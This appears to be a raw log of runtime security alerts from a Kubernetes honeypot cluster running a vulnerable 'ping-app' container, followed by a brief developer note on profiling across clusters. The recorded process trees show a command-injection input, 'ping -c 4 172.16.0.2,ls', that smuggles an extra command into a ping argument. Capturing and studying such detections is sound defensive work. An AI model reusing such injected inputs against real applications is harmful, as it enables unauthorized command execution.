172.16.0.2,ls","comm":"ping","ppid":22168,"pcomm":"sh","hardlink":"/bin/ping","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/ping"}]}]}]},"containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"event":{"runtime":{"runtimeName":"containerd","containerId":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","containerName":"ping-app","containerImageName":"docker.io/amitschendel/ping-app:latest","containerImageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d"},"k8s":{"namespace":"default","podName":"ping-app","podLabels":{"app":"ping-app","kubescape.io/max-sniffing-time":"5m"},"containerName":"ping-app","owner":{}},"timestamp":1744805755810226967,"type":"normal"},"level":"error","message":"Unexpected file access: /etc/host.conf with flags O_RDONLY,O_CLOEXEC","msg":"Unexpected file access","time":"2025-04-16T12:15:55Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected file access","arguments":{"flags":["O_RDONLY","O_CLOEXEC"],"path":"/etc/resolv.conf"},"infectedPID":22169,"severity":1,"timestamp":"2025-04-16T12:15:55.81024497Z","trace":{}},"CloudMetadata":null,"RuleID":"R0002","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"image":"docker.io/amitschendel/ping-app:latest","imageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d","namespace":"default","containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","podName":"ping-app","podNamespace":"default","workloadName":"ping-app","workloadNamespace":"default","workloadKind":"Pod"},"RuntimeProcessDetails":{"processTree":{"pid":2709,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2486,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":2734,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":22168,"cmdline":"/bin/sh -c ping -c 4 172.16.0.2,ls","comm":"sh","ppid":2734,"pcomm":"apache2","hardlink":"/bin/dash","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/dash","children":[{"pid":22169,"cmdline":"/bin/ping -c 4 172.16.0.2,ls","comm":"ping","ppid":22168,"pcomm":"sh","hardlink":"/bin/ping","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/ping"}]}]}]},"containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"event":{"runtime":{"runtimeName":"containerd","containerId":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","containerName":"ping-app","containerImageName":"docker.io/amitschendel/ping-app:latest","containerImageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d"},"k8s":{"namespace":"default","podName":"ping-app","podLabels":{"app":"ping-app","kubescape.io/max-sniffing-time":"5m"},"containerName":"ping-app","owner":{}},"timestamp":1744805755810244970,"type":"normal"},"level":"error","message":"Unexpected file access: /etc/resolv.conf with flags O_RDONLY,O_CLOEXEC","msg":"Unexpected file access","time":"2025-04-16T12:15:55Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected file access","arguments":{"flags":["O_RDONLY","O_CLOEXEC"],"path":"/etc/hosts"},"infectedPID":22169,"severity":1,"timestamp":"2025-04-16T12:15:55.810352331Z","trace":{}},"CloudMetadata":null,"RuleID":"R0002","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"image":"docker.io/amitschendel/ping-app:latest","imageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d","namespace":"default","containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","podName":"ping-app","podNamespace":"default","workloadName":"ping-app","workloadNamespace":"default","workloadKind":"Pod"},"RuntimeProcessDetails":{"processTree":{"pid":2709,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2486,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":2734,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":22168,"cmdline":"/bin/sh -c ping -c 4 172.16.0.2,ls","comm":"sh","ppid":2734,"pcomm":"apache2","hardlink":"/bin/dash","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/dash","children":[{"pid":22169,"cmdline":"/bin/ping -c 4 172.16.0.2,ls","comm":"ping","ppid":22168,"pcomm":"sh","hardlink":"/bin/ping","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/ping"}]}]}]},"containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"event":{"runtime":{"runtimeName":"containerd","containerId":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","containerName":"ping-app","containerImageName":"docker.io/amitschendel/ping-app:latest","containerImageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d"},"k8s":{"namespace":"default","podName":"ping-app","podLabels":{"app":"ping-app","kubescape.io/max-sniffing-time":"5m"},"containerName":"ping-app","owner":{}},"timestamp":1744805755810352331,"type":"normal"},"level":"error","message":"Unexpected file access: /etc/hosts with flags O_RDONLY,O_CLOEXEC","msg":"Unexpected file access","time":"2025-04-16T12:15:55Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected system call","arguments":{"syscall":"lseek"},"infectedPID":2709,"md5Hash":"4e79f11b07df8f72e945e0e3b3587177","sha1Hash":"b361a04dcb3086d0ecf960d3acaa776c62f03a55","severity":1,"size":"730 kB","timestamp":"2025-04-16T12:15:58.411292178Z","trace":{}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"namespace":"default","containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","podName":"ping-app","podNamespace":"default","workloadName":"ping-app","workloadNamespace":"default","workloadKind":"Pod"},"RuntimeProcessDetails":{"processTree":{"pid":2709,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2486,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":15237,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2"},{"pid":2733,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2"},{"pid":2735,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2"},{"pid":2734,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2"},{"pid":2737,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2"},{"pid":2736,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":19194,"cmdline":"sh -c ping -c 4 172.16.0.2","comm":"sh","ppid":2736,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/bin/dash"}]}]},"containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"event":{"runtime":{"runtimeName":"containerd","containerId":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"k8s":{"node":"k0s-01","namespace":"default","podName":"ping-app","podLabels":{"app":"ping-app","kubescape.io/max-sniffing-time":"5m"},"containerName":"ping-app","owner":{}},"timestamp":1744805758411292178,"type":"normal"},"level":"error","message":"Unexpected system call: lseek","msg":"Unexpected system call","time":"2025-04-16T12:15:58Z"}

OK: this is where I am at... Now implementing how to get this into an image and read it out, and testing which parts of the following profile translate across clusters and which don't.
